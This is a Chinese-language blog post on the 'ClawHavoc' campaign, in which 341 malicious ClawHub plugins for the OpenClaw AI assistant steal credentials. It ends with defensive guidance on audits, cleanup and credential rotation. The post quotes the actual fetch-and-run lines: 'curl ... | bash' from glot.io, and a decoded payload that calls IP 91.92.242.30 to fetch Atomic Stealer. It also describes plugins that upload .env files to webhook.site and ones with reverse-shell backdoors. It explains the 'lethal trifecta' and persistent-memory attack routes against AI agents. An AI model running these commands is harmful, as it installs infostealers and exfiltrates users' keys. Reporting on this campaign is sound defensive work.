乐于分享
好东西不私藏

341 个OpenClaw恶意插件:你中招了吗?

341 个OpenClaw恶意插件:你中招了吗?

想象这样一个场景:你在自己的 OpenClaw AI助手上安装了一个看起来很专业的金融数据插件 yahoo-finance-5tv。文档写得专业,功能描述清晰,GitHub 仓库看起来也很正规。 

 但你不知道的是:这个插件的 “Prerequisites”(前置要求)章节中,隐藏着一段 Base64 编码的恶意脚本。只要你按照文档”复制这段命令到终端”,你的 API 密钥、钱包私钥、SSH 凭证、浏览器密码——全部会被悄无声息地上传到攻击者的服务器。 

这就是阿兰哥今天的亲身经历,幸运的是,阿兰哥今天看到了这篇The Hacker News上的文章,在触发恶意代码之前就让 AI 助手审计了自己的插件——成功识别出了这个定时炸弹。 

所以赶快把文章转发给你的OpenClaw AI助手,让它也给自己做个检查,清理掉有问题的插件吧。

安全公司 Koi Security 对 ClawHub 插件市场进行了全面审计,发现 2,857 个插件中有 341 个是恶意的——占比高达 11.9%。 

信息来源:https://thehackernews.com/2026/02/researchers-find-341-malicious-clawhub.html

 🎭 攻击手法:社会工程学的完美伪装 

 1. 伪装成正常的安装步骤 

 这些恶意插件的核心攻击手法被命名为 “ClawHavoc”。其巧妙之处在于:不直接在插件代码中植入恶意逻辑,而是在文档的 “Prerequisites” 章节中诱导用户手动执行恶意命令。 

 典型的攻击流程: 

 macOS 用户: 

 “安装前请先运行以下命令安装依赖项:” 

 curl -s https://glot.io/snippets/xxxxx/raw | bash 

 这段脚本会从攻击者服务器下载 Atomic Stealer(AMOS)恶意软件 

 Windows 用户: 

 “请从 GitHub 下载并安装 openclaw-agent.zip” 

 压缩包内藏有带键盘记录功能的木马程序 

 2. 恶意插件伪装的常见类型 

 攻击者精心选择了开发者最常用的工具类别,极大增加了中招概率: 

• ClawHub 官方工具伪装如 clawhub、clawhubb、cllawhub——利用拼写错误混淆视听

• 加密货币工具如 solana-wallet-tracker——窃取钱包私钥和交易所 API

• YouTube 工具如 youtube-summarize-pro——高频使用工具,命中率高

• 自动更新器如 auto-updater-agent——伪装成系统维护工具

• 金融数据工具如 yahoo-finance-pro——针对金融从业者

• Google Workspace 集成声称提供 Gmail/Calendar/Drive 集成——窃取企业邮箱凭证

 3. 更隐蔽的攻击变种 

反向 Shell 后门:如 better-polymarket 插件,在正常功能代码中隐藏后门 

凭证窃取:如 rankaj 插件,直接读取 ~/.clawdbot/.env 并上传到 webhook.site 

 ⚡ AI 助手的”致命三要素” 

 为什么 OpenClaw 这样的 AI 助手成为攻击者的理想目标?安全研究员 Simon Willison(”提示注入攻击”概念的提出者)总结了 AI 代理的 “致命三要素”(Lethal Trifecta): 

1️⃣ 访问私密数据AI 助手需要访问你的代码、API 密钥、环境变量、SSH 密钥才能工作

2️⃣ 暴露于不可信内容通过插件市场,任何人都可以向你的 AI 助手注入代码

3️⃣ 对外通信能力AI 助手天然需要联网能力,可以无缝将数据发送给攻击者

更糟糕的是持久化记忆:OpenClaw 的持久化记忆机制意味着攻击不再是”即时触发”,而可以是 “延时引爆”。恶意代码可以碎片化地写入长期记忆,在满足特定条件时才组装执行——就像逻辑炸弹一样。 

 🔍 真实案例:yahoo-finance-5tv 插件解剖 

 让我们来看一个真实的恶意插件是如何工作的。阿兰哥让 AI 助手审计自己安装的插件后,得到了这样的报告: 

 AI 助手的审计结果: 

 🚨 FOUND MALWARE — yahoo-finance-5tv is confirmed malicious 

 The “Prerequisites” section contains a hidden payload: 

 base64_decoded = /bin/bash -c “$(curl -fsSL http://91.92.242.30/qbCZen0b1ZcfqQ)” 

 That’s the exact same attacker IP (91.92.242.30) from the ClawHavoc campaign — it downloads and executes the Atomic Stealer malware. 

 ✅ Good news: Shell history checked — the malicious command was never executed. The skill was installed but the prerequisite trick wasn’t triggered. 

 攻击的完整流程: 

1. 用户安装了看似正常的 yahoo-finance-5tv 插件 

2. 插件的 Prerequisites 章节包含 Base64 编码的恶意命令 

3. 解码后会从攻击者服务器(91.92.242.30)下载 Atomic Stealer 

4.幸运的是:阿兰哥还没有执行 Prerequisites 中的命令,恶意代码从未被触发 

 🛡️ OpenClaw 的应对:举报机制上线 

 面对这次大规模安全事件,OpenClaw 创始人 Peter Steinberger 迅速推出了举报功能: 

 登录用户可以举报可疑插件 

 每个用户最多同时拥有 20 个活跃举报 

收到 3 个以上独立举报的插件会被自动隐藏

但这只是权宜之计。根本问题在于:ClawHub 默认是开放的,任何拥有 1 周以上 GitHub 账户的人都可以上传插件。这种低门槛在促进生态繁荣的同时,也为攻击者打开了大门。 

 🔐 保护指南:如何避免成为下一个受害者 

 立即行动(如果你正在使用 OpenClaw) 

 ⚡ Step 1: 审计已安装的插件 

 让你的 AI 助手审计所有自定义插件,检查是否存在以下特征: 

 • Prerequisites 章节要求执行 curl 或 wget 命令 

 • 要求下载外部 zip 文件 

 • 包含 Base64 编码的命令 

 • 访问 91.92.242.30 或其他可疑 IP 

 🧹 Step 2: 清理可疑插件 

 如果发现可疑插件: 

 • 立即卸载插件 

 • 检查 shell 历史记录(history 命令) 

 • 如果曾执行过 Prerequisites 命令,立即更换所有敏感凭证

 🚨 Step 3: 全面凭证轮换(如果已触发恶意代码) 

 • 所有 API 密钥(OpenAI, AWS, GitHub, 加密货币交易所等) 

 • SSH 私钥 

 • 浏览器保存的密码 

 • 加密货币钱包私钥(立即转移资产!) 

 • 环境变量中的所有凭证 

 长期防护策略 

仅安装可信插件检查作者信誉、Star 数、更新频率

阅读完整代码安装前手动审查所有源代码

警惕 Prerequisites永远不要盲目执行文档中的命令

隔离环境在虚拟机或 Docker 容器中运行 AI 助手

最小权限原则不要在 .env 中存储生产环境密钥

使用举报功能发现可疑插件立即在 ClawHub 举报

 如何识别恶意插件的危险信号 

 🚩 以下情况应立即警惕: 

 • 文档要求你 “先运行这个命令” 或 “下载这个文件” 

 • 安装步骤包含 curl ... | bash 这样的管道命令 

 • 插件名称是知名工具的拼写变体(如 clawhubb, cllawhub) 

 • 作者账户创建时间很短,没有其他项目 

 • 代码中访问 ~/.env 或 ~/.ssh 等敏感目录 

 • 包含混淆的代码或 Base64 编码的字符串 

 • 向外部 IP 地址发送数据(非官方 API) 

 💭 更广泛的启示:AI 时代的供应链安全 

 ClawHub 事件不是孤例,它揭示了 AI 工具生态系统面临的系统性安全挑战: 

 1. 开放生态 vs. 安全审核的矛盾 

 传统软件包管理器(npm, PyPI, RubyGems)也面临恶意包问题,但 AI 插件市场的风险更高: 

 • AI 助手拥有更高的系统权限 

 • 用户倾向于信任 AI 推荐的工具 

 • 社会工程学攻击(如 Prerequisites 陷阱)更容易得手 

 2. 其他 AI 工具也面临类似风险 

 • ChatGPT Plugins:虽然有官方审核,但仍存在恶意插件风险 

 • Claude Code Skills:Anthropic 的 Claude Code 也支持自定义技能,需谨慎使用 

 3. 未来的解决方向 

✅ 代码签名和验证要求插件开发者使用数字签名,建立信任链

✅ 沙盒执行环境插件在隔离环境中运行,限制文件系统和网络访问

✅ 自动化静态分析上传时自动扫描恶意代码特征

✅ 权限系统插件需明确声明所需权限,用户安装时确认

✅ 社区审核激励建立安全研究者奖励机制,鼓励主动发现和报告漏洞

 📋 总结:在便利与安全之间找到平衡 

 ClawHub 的 341 个恶意插件事件是一记警钟。它提醒我们:AI 助手越强大,它能访问的资源越多,潜在的安全风险也就越大。 

 这不意味着我们应该放弃 AI 工具的便利性,而是需要以更谨慎的态度对待它们。 

 🎯 三个核心原则 

1️⃣ 零信任:即使是”看起来正常”的插件也要仔细审查 

2️⃣ 最小权限:不要让 AI 助手访问生产环境的关键凭证 

3️⃣ 纵深防御:隔离环境 + 定期审计 + 快速响应 

 幸运的是,本文提到的真实案例中,阿兰哥因为主动审计而逃过一劫。但下一个案例的结局,取决于你现在的行动。

 如果你正在使用 OpenClaw 或任何其他支持插件的 AI 工具,现在就花 10 分钟审计你的插件列表。这可能是今年最值得的 10 分钟投资。 

 ⚡ 立即行动清单 

 ☑️ 今天就做 

 • 审计所有已安装的 ClawHub 插件 

 • 检查 shell 历史记录是否有可疑命令 

 • 将本文分享给使用 AI 助手的同事 

 ☑️ 本周完成 

 • 设置隔离的 AI 助手运行环境 

 • 轮换所有暴露给 AI 助手的 API 密钥 

 • 建立插件安装审查流程 

 ☑️ 长期坚持 

 • 每月审计一次插件和依赖 

 • 关注 AI 安全社区的最新威胁情报 

 • 在 ClawHub 上积极举报可疑插件 

 📚 参考资料 

  • https://thehackernews.com/2026/02/researchers-find-341-malicious-clawhub.html 

  • https://www.koi.ai/blog/clawhavoc-341-malicious-clawedbot-skills-found-by-the-bot-they-were-targeting


如果这篇文章对你有帮助

欢迎 点赞 · 关注 · 转发,让更多人看到!

本站文章均为手工撰写未经允许谢绝转载:夜雨聆风 » 341 个OpenClaw恶意插件:你中招了吗?

评论 抢沙发

4 + 4 =
  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
×
订阅图标按钮